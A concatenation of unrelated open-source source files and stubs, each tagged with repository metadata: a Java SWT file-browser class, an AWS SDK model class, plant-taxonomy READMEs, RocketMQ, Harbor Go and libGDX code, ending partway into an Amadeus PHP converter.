mntmFoldersVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFoldersVisible_1.setSelection(mntmFoldersVisible.getSelection());
onFoldersVisibleChecked(mntmFoldersVisible.getSelection());
}
});
mntmFilesVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFilesVisible_1.setSelection(mntmFilesVisible.getSelection());
onFilesVisibleChecked(mntmFilesVisible.getSelection());
}
});
mntmCompressedFoldersVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFoldersVisible_1.setSelection(mntmCompressedFoldersVisible.getSelection());
onCompressedFoldersVisibleChecked(mntmCompressedFoldersVisible.getSelection());
}
});
mntmCompressedFilesVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFilesVisible_1.setSelection(mntmCompressedFilesVisible.getSelection());
onCompressedFilesVisibleSelected(mntmCompressedFilesVisible.getSelection());
}
});
compositeStatusBar = new Composite(shell, SWT.NONE);
compositeStatusBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
compositeStatusBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
GridLayout gl_compositeStatusBar = new GridLayout(2, false);
gl_compositeStatusBar.marginWidth = 0;
gl_compositeStatusBar.marginHeight = 0;
compositeStatusBar.setLayout(gl_compositeStatusBar);
formToolkit.adapt(compositeStatusBar);
formToolkit.paintBordersFor(compositeStatusBar);
lblStatusBar = new Label(compositeStatusBar, SWT.NONE);
lblStatusBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
lblStatusBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
formToolkit.adapt(lblStatusBar, true, true);
lblStatusBar.setText("");
progressBar = new ProgressBar(compositeStatusBar, SWT.NONE);
formToolkit.adapt(progressBar, true, true);
m_bindingContext = initDataBindings();
}
/*
* event handlers
*/
protected void onCopyAsStringSelected() {
ArrayList<String> s = new ArrayList<String>();
for (PathEntry p: getSelectedPathEntries()) {
s.add(p.getPath());
}
StringSelection ss = new StringSelection(String.join("\n", s));
Clipboard clip = Toolkit.getDefaultToolkit().getSystemClipboard();
clip.setContents(ss, ss);
}
protected void onOpenSelected(SelectionEvent e) {
DBPathEntry entry = getSelectedPathEntry();
if (entry != null) {
setLocationAndRefresh(entry);
}
}
protected void onOpenInNewWindowSelected(SelectionEvent e) {
DBPathEntry p = getSelectedPathEntry();
if (p == null) {
p = location.get().getPathEntry();
}
if (p != null) {
new SwtFileFolderMenu().setLocationAndRefresh(p);
} else if (location.get().getPathString() != null) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getPathString());
} else if (location.get().getSearchString() != null) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getSearchString());
} else if (location.get().getPathId() != 0L) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getPathId());
}
}
protected void onOpenDuplicateDetailsSelected(SelectionEvent e) {
DBPathEntry p = getSelectedPathEntry();
if (p == null) {
p = location.get().getPathEntry();
}
if (p != null) {
new SwtDuplicateMenu().setLocationAndRefresh(p);
} else if (location.get().getPathString() != null) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getPathString());
} else if (location.get().getSearchString() != null) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getSearchString());
} else if (location.get().getPathId() != 0L) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getPathId());
}
}
protected void onNavigatePreviousSelected(SelectionEvent e) {
location.navigatePrevious();
setLocationAndRefresh(location.get());
}
protected void onNavigateNextSelected(SelectionEvent e) {
location.navigateNext();
setLocationAndRefresh(location.get());
}
protected void onUpperFolderSelected(SelectionEvent e) {
DBPathEntry p = location.get().getPathEntry();
if (p != null && p.getParentId() != 0L) {
setLocationAndRefresh(p.getParentId());
} else {
writeStatusBar("Not ready for going up operation; be patient.");
}
}
protected void onLocationModified(ModifyEvent arg0) {
String newstring = txtLocation.getText();
Assertion.assertNullPointerException(newstring != null);
writeStatusBar(String.format("New path string is: %s", newstring));
shell.setText(newstring);
Location oldloc = location.get();
if (newstring.equals(oldloc.getPathString())) {
// noop
} else if (newstring.equals(oldloc.getSearchString())) {
oldloc.setPathEntry(null);
oldloc.setPathId(0L);
oldloc.setPathString(null);
} else {
Location newloc = new Location();
newloc.setPathString(newstring);
location.add(newloc);
}
refresh();
}
protected void onTableSelected(SelectionEvent e) {}
private String order = PreferenceRW.getSwtFileFolderMenuSortOrder();
private boolean isFolderChecked = true;
private boolean isFileChecked = true;
private boolean isCompressedFolderChecked = true;
private boolean isCompressedFileChecked = true;
protected void onTblclmnPathSelected(TableColumn tblclmnPath, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "path";
} else {
order = "path DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDateLastModifiedSelected(TableColumn tblclmnDateLastModified, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "datelastmodified";
} else {
order = "datelastmodified DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnSizeSelected(TableColumn tblclmnSize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "size";
} else {
order = "size DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnCompressedsizeSelected(TableColumn tblclmnCompressedesize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "compressedsize";
} else {
order = "compressedsize DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDuplicateSelected(TableColumn tblclmnDuplicate, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "duplicate";
} else {
order = "duplicate DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDedupablesizeSelected(TableColumn tblclmnDedupablesize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "dedupablesize";
} else {
order = "dedupablesize DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onFoldersVisibleChecked(boolean checked) {
isFolderChecked = checked;
refresh();
}
protected void onFilesVisibleChecked(boolean checked) {
isFileChecked = checked;
refresh();
}
protected void onCompressedFoldersVisibleChecked(boolean checked) {
isCompressedFolderChecked = checked;
refresh();
}
protected void onCompressedFilesVisibleSelected(boolean checked) {
isCompressedFileChecked = checked;
refresh();
}
public void setLocationAndRefresh(final String text) {
Display.getDefault().asyncExec(new Runnable() {
public void run() {
txtLocation.setText(text); // onLocationModified() is automatically called here.
}
});
}
/*
* setLocationAndRefresh and related
*/
public void setLocationAndRefresh(final DBPathEntry entry) {
Assertion.assertNullPointerException(entry != null);
Assertion.assertNullPointerException(location != null);
Location oldloc = location.get();
if (oldloc.getPathEntry() != null && oldloc.getPathEntry().getPathId() == entry.getPathId()) {
// noop
} else if (oldloc.getPathString() != null && oldloc.getPathString().equals(entry.getPath())) {
oldloc.setPathEntry(entry);
oldloc.setPathId(entry.getPathId());
} else {
Location newloc = new Location();
newloc.setPathEntry(entry);
newloc.setPathId(entry.getPathId());
newloc.setPathString(entry.getPath());
location.add(newloc);
}
setLocationAndRefresh(entry.getPath());
}
public void setLocationAndRefresh(long id) {
writeStatusBar(String.format("Starting query; new ID is: %d", id));
Location oldloc = location.get();
if (oldloc.getPathId() == id) {
// null
} else {
Location newloc = new Location();
newloc.setPathId(id);
location.add(newloc);
}
refresh(new LazyRunnable() {
@Override
public void run() throws SQLException, InterruptedException {
Debug.writelog("-- SwtFileFolderMenu SetLocationAndRefresh LOCAL PATTERN (id based) --");
Location loc = location.get();
DBPathEntry p = getDB().getDBPathEntryByPathId(loc.getPathId());
if (p != null) {
loc.setPathEntry(p);
loc.setPathString(p.getPath());
loc.setSearchString(null);
setLocationAndRefresh(loc.getPathString());
}
}
});
}
public void setLocationAndRefresh(final Location loc) {
if (loc.getPathString() != null) {
setLocationAndRefresh(loc.getPathString());
} else if (loc.getPathEntry() != null) {
setLocationAndRefresh(loc.getPathEntry().getPath());
} else if (loc.getSearchString() != null) {
setLocationAndRefresh(loc.getSearchString());
} else {
setLocationAndRefresh("");
}
}
/*
* normal refresh
*/
private Scenario scenario = new Scenario();
protected synchronized void refresh() {
refresh(scenario);
}
class Scenario extends SwtCommonFileFolderMenu.Scenario {
@Override
public void run() throws SQLException, InterruptedException {
writeProgress(10);
Location loc = location.get();
if (loc.getPathEntry() == null && loc.getSearchString() == null &&
(loc.getPathEntry() != null || loc.getPathId() != 0L
|| (loc.getPathString() != null && !"".equals(loc.getPathString())))) {
writeProgress(50);
if (loc.getPathString() != null) {
DBPathEntry p = getDB().getDBPathEntryByPath(loc.getPathString());
if (p != null) {
loc.setPathEntry(p);
loc.setPathId(p.getPathId());
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 1 (path based entry detection) --");
} else {
loc.setSearchString(loc.getPathString());
loc.setPathString(null);
loc.setPathId(0L);
loc.setPathEntry(null);
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 2 (searchstring=" + loc.getSearchString() + ") --");
}
} else if (loc.getPathId() != 0L) {
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 3 (id based) --");
DBPathEntry p = getDB().getDBPathEntryByPathId(loc.getPathId());
assert(p != null);
setLocationAndRefresh(p);
return;
} else {
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 4 (show all paths) --");
}
}
try {
threadWait();
cleanupTable();
ArrayList<String> typelist = new ArrayList<String> ();
if (isFolderChecked) {
typelist.add("type=0");
}
if (isFileChecked) {
typelist.add("type=1");
}
if (isCompressedFolderChecked) {
typelist.add("type=2");
}
if (isCompressedFileChecked) {
typelist.add("type=3");
}
String typeWhere = typelist.size() == 0 ? "" : String.join(" OR ", typelist);
threadWait();
writeStatusBar("Querying...");
writeProgress(70);
String searchSubSQL;
ArrayList<String> searchStringElement = new ArrayList<String> ();
if (loc.getSearchString() == null || "".equals(loc.getSearchString())) {
searchSubSQL = "";
} else {
ArrayList<String> p = new ArrayList<String> ();
for (String s: loc.getSearchString().split(" ")) {
if (! "".equals(s)) {
p.add("path LIKE ?");
searchStringElement.add(s);
}
}
searchSubSQL = " AND (" + String.join(" AND ", p) + ")";
}
threadWait();
DBPathEntry locationPathEntry = null;
PreparedStatement ps;
if (loc.getPathString() == null || "".equals(loc.getPathString())) {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
} else if ((locationPathEntry = loc.getPathEntry()) != null) {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND (pathid=? OR EXISTS (SELECT * FROM upperlower WHERE upper=? AND lower=pathid))"
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
ps.setLong(c++, locationPathEntry.getPathId());
ps.setLong(c++, locationPathEntry.getPathId());
Debug.writelog(locationPathEntry.getPath());
} else {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND path LIKE ?"
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
ps.setString(c++, loc.getPathString() + "%");
Debug.writelog(loc.getPathString());
}
try {
LazyUpdater.Dispatcher disp = getDB().getDispatcher();
disp.setList(Dispatcher.NONE);
disp.setCsum(Dispatcher.NONE);
ResultSet rs = ps.executeQuery();
try {
threadWait();
Debug.writelog("QUERY FINISHED");
writeStatusBar("Listing...");
writeProgress(90);
int count = 0;
while (rs.next()) {
threadWait();
DBPathEntry p1 = getDB().rsToPathEntry(rs);
Assertion.assertAssertionError(p1 != null);
Assertion.assertAssertionError(p1.getPath() != null);
if (locationPathEntry != null) {
Assertion.assertAssertionError(locationPathEntry.getPath() != null);
Assertion.assertAssertionError(p1.getPath().startsWith(locationPathEntry.getPath()),
p1.getPath() + " does not start with " + locationPathEntry.getPath()
);
}
PathEntry p2;
try {
p2 = disp.dispatch(p1);
} catch (IOException e) {
p2 = null;
}
if (p2 == null) {
addRow(p1, rs.getInt("duplicate"), rs.getLong("dedupablesize"), true);
getDB().unsetClean(p1.getParentId());
} else {
Assertion.assertAssertionError(p1.getPath().equals(p2.getPath()),
"!! " + p1.getPath() + " != " + p2.getPath());
if (!PathEntry.dscMatch(p1, p2)) {
p1.setDateLastModified(p2.getDateLastModified());
p1.setSize(p2.getSize());
p1.setCompressedSize(p2.getCompressedSize());
p1.clearCsum();
getDB().unsetClean(p1.getParentId());
}
addRow(p1, rs.getInt("duplicate"), rs.getLong("dedupablesize"), false);
}
count ++;
}
writeStatusBar(String.format("%d items", count));
} finally {
rs.close();
}
} finally {
ps.close();
}
writeProgress(0);
} catch (WindowDisposedException e) {}
}
protected void cleanupTable() throws WindowDisposedException {
if (table.isDisposed()) {
throw new WindowDisposedException("!! Window disposed at cleanupTable");
}
Display.getDefault().asyncExec(new Runnable() {
public void run() {
pathentrylist.clear();
table.removeAll();;
}
});
}
protected void addRow(final DBPathEntry entry, final int duplicate,
final long dedupablesize, final boolean grayout) throws WindowDisposedException {
if (table.isDisposed()) {
throw new WindowDisposedException("!! Window disposed at addRow");
}
Display.getDefault().asyncExec(new Runnable() {
public void run() {
pathentrylist.add(entry);
final SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
final NumberFormat numf = NumberFormat.getNumberInstance();
Date d = new Date(entry.getDateLastModified());
String[] row = {
entry.getPath(),
sdf.format(d),
numf.format(entry.getSize()),
numf.format(entry.getCompressedSize()),
(duplicate > 0 ? numf.format(duplicate) : null),
(dedupablesize > 0 ? numf.format(dedupablesize) : null),
};
final Display display = Display.getDefault();
final Color blue = new Color(display, 0, 0, 255);
final Color red = new Color(display, 255, 0, 0);
final Color black = new Color(display, 0, 0, 0);
final Color gray = new Color(display, 127, 127, 127);
try {
TableItem tableItem = new TableItem(table, SWT.NONE);
tableItem.setText(row);
if (grayout) {
tableItem.setForeground(gray);
} else if (entry.isNoAccess()) {
tableItem.setForeground(red);
} else if (entry.isFile() && entry.getSize() != entry.getCompressedSize()) {
tableItem.setForeground(blue);
} else {
tableItem.setForeground(black);
}
} catch (Exception e) {
if (!table.isDisposed()) {
e.printStackTrace();
}
}
}
});
}
}
protected DataBindingContext initDataBindings() {
DataBindingContext bindingContext = new DataBindingContext();
//
IObservableValue observeBackgroundCompositeObserveWidget = WidgetProperties.background().observe(compositeToolBar);
IObservableValue backgroundShellObserveValue = PojoProperties.value("background").observe(shell);
bindingContext.bindValue(observeBackgroundCompositeObserveWidget, backgroundShellObserveValue, null, null);
//
IObservableValue observeBackgroundLblStatusBarObserveWidget = WidgetProperties.background().observe(lblStatusBar);
bindingContext.bindValue(observeBackgroundLblStatusBarObserveWidget, backgroundShellObserveValue, null, null);
//
IObservableValue observeBackgroundCompositeStatusBarObserveWidget = WidgetProperties.background().observe(compositeStatusBar);
bindingContext.bindValue(observeBackgroundCompositeStatusBarObserveWidget, backgroundShellObserveValue, null, null);
//
return bindingContext;
}
}
| n-i-e/deepfolderview | src/main/java/com/github/n_i_e/deepfolderview/SwtFileFolderMenu.java | Java | apache-2.0 | 41,340 |
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.medialive.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.protocol.StructuredPojo;
import com.amazonaws.protocol.ProtocolMarshaller;
/**
* Settings for the action to deactivate the image in a specific layer.
*
* @see <a
* href="http://docs.aws.amazon.com/goto/WebAPI/medialive-2017-10-14/StaticImageDeactivateScheduleActionSettings"
* target="_top">AWS API Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class StaticImageDeactivateScheduleActionSettings implements Serializable, Cloneable, StructuredPojo {
/** The time in milliseconds for the image to fade out. Default is 0 (no fade-out). */
private Integer fadeOut;
/** The image overlay layer to deactivate, 0 to 7. Default is 0. */
private Integer layer;
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @param fadeOut
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*/
public void setFadeOut(Integer fadeOut) {
this.fadeOut = fadeOut;
}
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @return The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*/
public Integer getFadeOut() {
return this.fadeOut;
}
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @param fadeOut
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
* @return Returns a reference to this object so that method calls can be chained together.
*/
public StaticImageDeactivateScheduleActionSettings withFadeOut(Integer fadeOut) {
setFadeOut(fadeOut);
return this;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @param layer
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*/
public void setLayer(Integer layer) {
this.layer = layer;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @return The image overlay layer to deactivate, 0 to 7. Default is 0.
*/
public Integer getLayer() {
return this.layer;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @param layer
* The image overlay layer to deactivate, 0 to 7. Default is 0.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public StaticImageDeactivateScheduleActionSettings withLayer(Integer layer) {
setLayer(layer);
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getFadeOut() != null)
sb.append("FadeOut: ").append(getFadeOut()).append(",");
if (getLayer() != null)
sb.append("Layer: ").append(getLayer());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof StaticImageDeactivateScheduleActionSettings == false)
return false;
StaticImageDeactivateScheduleActionSettings other = (StaticImageDeactivateScheduleActionSettings) obj;
if (other.getFadeOut() == null ^ this.getFadeOut() == null)
return false;
if (other.getFadeOut() != null && other.getFadeOut().equals(this.getFadeOut()) == false)
return false;
if (other.getLayer() == null ^ this.getLayer() == null)
return false;
if (other.getLayer() != null && other.getLayer().equals(this.getLayer()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getFadeOut() == null) ? 0 : getFadeOut().hashCode());
hashCode = prime * hashCode + ((getLayer() == null) ? 0 : getLayer().hashCode());
return hashCode;
}
@Override
public StaticImageDeactivateScheduleActionSettings clone() {
try {
return (StaticImageDeactivateScheduleActionSettings) super.clone();
} catch (CloneNotSupportedException e) {
throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e);
}
}
@com.amazonaws.annotation.SdkInternalApi
@Override
public void marshall(ProtocolMarshaller protocolMarshaller) {
com.amazonaws.services.medialive.model.transform.StaticImageDeactivateScheduleActionSettingsMarshaller.getInstance().marshall(this, protocolMarshaller);
}
}
| jentfoo/aws-sdk-java | aws-java-sdk-medialive/src/main/java/com/amazonaws/services/medialive/model/StaticImageDeactivateScheduleActionSettings.java | Java | apache-2.0 | 5,899 |
# Arkezostis tayuya Kuntze SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Cucurbitales/Cucurbitaceae/Arkezostis/Arkezostis tayuya/README.md | Markdown | apache-2.0 | 174 |
/**
* Copyright (C) 2010-2013 Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alibaba.rocketmq.broker.client;
import io.netty.channel.Channel;
import java.util.List;
/**
* @author shijia.wxr<[email protected]>
* @since 2013-6-24
*/
public interface ConsumerIdsChangeListener {
public void consumerIdsChanged(final String group, final List<Channel> channels);
}
| dingjun84/mq-backup | rocketmq-broker/src/main/java/com/alibaba/rocketmq/broker/client/ConsumerIdsChangeListener.java | Java | apache-2.0 | 963 |
# Lampocarya affinis Brongn. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Poales/Cyperaceae/Morelotia/Morelotia affinis/ Syn. Lampocarya affinis/README.md | Markdown | apache-2.0 | 183 |
# Myriocladus maguirei Swallen SPECIES
#### Status
ACCEPTED
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Poales/Poaceae/Myriocladus/Myriocladus maguirei/README.md | Markdown | apache-2.0 | 186 |
# Solanum apiculatibaccatum Bitter SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Solanales/Solanaceae/Solanum/Solanum mite/ Syn. Solanum apiculatibaccatum/README.md | Markdown | apache-2.0 | 189 |
# Gnaphalium angustifolium Lam. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
Encycl. 2:746. 1788
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Asterales/Asteraceae/Helichrysum/Helichrysum litoreum/ Syn. Gnaphalium angustifolium/README.md | Markdown | apache-2.0 | 201 |
# Entylomella microstigma (Sacc.) Cif., 1959 SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
Lejeunia Mém. 177 (1959)
#### Original name
null
### Remarks
null | mdoering/backbone | life/Fungi/Basidiomycota/Exobasidiomycetes/Entylomatales/Entylomataceae/Entyloma/Entyloma achilleae/ Syn. Entylomella microstigma/README.md | Markdown | apache-2.0 | 220 |
# Acacia pennatula (Schltdl. & Cham.) Benth. SPECIES
#### Status
ACCEPTED
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
London J. Bot. 1:390. 1842
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Fabales/Fabaceae/Acacia/Acacia pennatula/README.md | Markdown | apache-2.0 | 222 |
# Niptera dilutella (Fr.) Rehm SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Fungi/Ascomycota/Orbiliomycetes/Orbiliales/Orbiliaceae/Orbilia/Hyalinia dilutella/ Syn. Niptera dilutella/README.md | Markdown | apache-2.0 | 185 |
// copyright (c) 2017 vmware, inc. all rights reserved.
//
// licensed under the apache license, version 2.0 (the "license");
// you may not use this file except in compliance with the license.
// you may obtain a copy of the license at
//
// http://www.apache.org/licenses/license-2.0
//
// unless required by applicable law or agreed to in writing, software
// distributed under the license is distributed on an "as is" basis,
// without warranties or conditions of any kind, either express or implied.
// see the license for the specific language governing permissions and
// limitations under the license.
package dao
import (
"github.com/astaxie/beego/orm"
"github.com/vmware/harbor/src/common/models"
"fmt"
"time"
)
// AddScanJob ...
func AddScanJob(job models.ScanJob) (int64, error) {
o := GetOrmer()
if len(job.Status) == 0 {
job.Status = models.JobPending
}
return o.Insert(&job)
}
// GetScanJob ...
func GetScanJob(id int64) (*models.ScanJob, error) {
o := GetOrmer()
j := models.ScanJob{ID: id}
err := o.Read(&j)
if err == orm.ErrNoRows {
return nil, nil
}
return &j, nil
}
// GetScanJobsByImage returns a list of scan jobs with given repository and tag
func GetScanJobsByImage(repository, tag string, limit ...int) ([]*models.ScanJob, error) {
var res []*models.ScanJob
_, err := scanJobQs(limit...).Filter("repository", repository).Filter("tag", tag).OrderBy("-id").All(&res)
return res, err
}
// GetScanJobsByDigest returns a list of scan jobs with given digest
func GetScanJobsByDigest(digest string, limit ...int) ([]*models.ScanJob, error) {
var res []*models.ScanJob
_, err := scanJobQs(limit...).Filter("digest", digest).OrderBy("-id").All(&res)
return res, err
}
// UpdateScanJobStatus updates the status of a scan job.
func UpdateScanJobStatus(id int64, status string) error {
o := GetOrmer()
sj := models.ScanJob{
ID: id,
Status: status,
UpdateTime: time.Now(),
}
n, err := o.Update(&sj, "Status", "UpdateTime")
if n == 0 {
return fmt.Errorf("Failed to update scan job with id: %d, error: %v", id, err)
}
return err
}
func scanJobQs(limit ...int) orm.QuerySeter {
o := GetOrmer()
l := -1
if len(limit) == 1 {
l = limit[0]
}
return o.QueryTable(models.ScanJobTable).Limit(l)
}
| wknet123/harbor | src/common/dao/scan_job.go | GO | apache-2.0 | 2,269 |
package com.bjorktech.cayman.idea.designpattern.structure.proxy;
public class TargetClass implements TargetInterface {
@Override
public long add(long a, long b) {
long temp = a + b;
System.out.println(temp);
return temp;
}
@Override
public long sub(long a, long b) {
long temp = a - b;
System.out.println(temp);
return temp;
}
}
| wanliwang/cayman | cm-idea/src/main/java/com/bjorktech/cayman/idea/designpattern/structure/proxy/TargetClass.java | Java | apache-2.0 | 351 |
package com.badlogic.gdx.ingenuity.scene2d;
import com.badlogic.gdx.graphics.Color;
import com.badlogic.gdx.ingenuity.GdxData;
import com.badlogic.gdx.ingenuity.helper.PixmapHelper;
import com.badlogic.gdx.ingenuity.utils.GdxUtilities;
import com.badlogic.gdx.scenes.scene2d.Group;
import com.badlogic.gdx.scenes.scene2d.Stage;
import com.badlogic.gdx.scenes.scene2d.actions.Actions;
import com.badlogic.gdx.scenes.scene2d.ui.Image;
import com.badlogic.gdx.utils.Align;
import com.badlogic.gdx.utils.Disposable;
/**
* @作者 Mitkey
* @时间 2017年3月24日 下午3:09:56
* @类说明:
* @版本 xx
*/
public class Loading implements Disposable {
private Group root = new Group();
private Image imgOut;
private Image imgInner;
public Loading() {
root.setSize(GdxData.WIDTH, GdxData.HEIGHT);
Image imgBg = new Image(PixmapHelper.getInstance().newTranslucentDrawable(5, 5));
imgBg.setFillParent(true);
root.addActor(imgBg);
imgOut = new Image(PixmapHelper.getInstance().newRectangleDrawable(Color.YELLOW, 40, 40));
imgOut.setOrigin(Align.center);
imgInner = new Image(PixmapHelper.getInstance().newCircleDrawable(Color.RED, 18));
imgInner.setOrigin(Align.center);
GdxUtilities.center(imgOut);
GdxUtilities.center(imgInner);
root.addActor(imgOut);
root.addActor(imgInner);
}
public void show(Stage stage) {
stage.addActor(root);
root.toFront();
imgOut.clearActions();
imgOut.addAction(Actions.forever(Actions.rotateBy(-360, 1f)));
imgInner.clearActions();
imgInner.addAction(Actions.forever(Actions.rotateBy(360, 2f)));
}
public void hide() {
root.remove();
}
@Override
public void dispose() {
hide();
}
}
| mitkey/libgdx-ingenuity | depot/src/com/badlogic/gdx/ingenuity/scene2d/Loading.java | Java | apache-2.0 | 1,675 |
<?php
/**
* amadeus-ws-client
*
* Copyright 2020 Amadeus Benelux NV
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* @package Amadeus
* @license https://opensource.org/licenses/Apache-2.0 Apache 2.0
*/
namespace Amadeus\Client\RequestCreator\Converter\Fare;
use Amadeus\Client\RequestCreator\Converter\BaseConverter;
use Amadeus\Client\RequestOptions\FarePriceUpsellWithoutPnrOptions;
use Amadeus\Client\Struct;
/**
* Fare_PriceUpsellWithoutPNR Request converter
*
* @package Amadeus\Client\RequestCreator\Converter\Fare
* @author Valerii Nezhurov <[email protected]>
*/
class PriceUpsellWithoutPNRConv extends BaseConverter
{
/**
* @param FarePriceUpsellWithoutPnrOptions $requestOptions
* @param int|string $version
* @return Struct\Fare\PriceUpsellWithoutPNR
*/
public function convert($requestOptions, $version)
{
